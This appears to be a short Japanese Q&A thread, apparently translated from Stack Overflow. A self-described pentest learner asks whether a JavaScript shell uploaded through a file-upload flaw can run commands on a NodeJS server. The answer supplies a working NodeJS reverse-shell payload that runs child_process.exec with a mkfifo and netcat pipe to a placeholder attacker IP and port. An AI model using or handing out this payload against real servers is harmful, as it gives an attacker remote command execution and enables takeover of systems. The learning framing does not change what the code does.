NodeJS ペンテスト プロセスを学習しようとしています。NodeJS Web サイトでリモート ファイル アップロードの脆弱性を発見しました。PHP や ASPX で行うように、NodeJS でリモート シェルをアップロードしてコマンドを実行できますか? NodeJS shell.js をアップロードして、このシェルからサーバーで unix コマンドを実行できますか?
質問する
2754 次
2 に答える
0
ファイルを「実行」できる場合にのみ可能です。
しかし、JavaScript コードを「実行」できる場合は、これを使用してリバース シェルを作成できます。
(function () {
require("child_process")
.exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerIP> <attackerPort> >/tmp/f')
})()]
それ以外の場合、ファイルを実行できない場合は、ファイルの内容のみが表示されます。
于 2020-08-27T22:15:11.050 に答える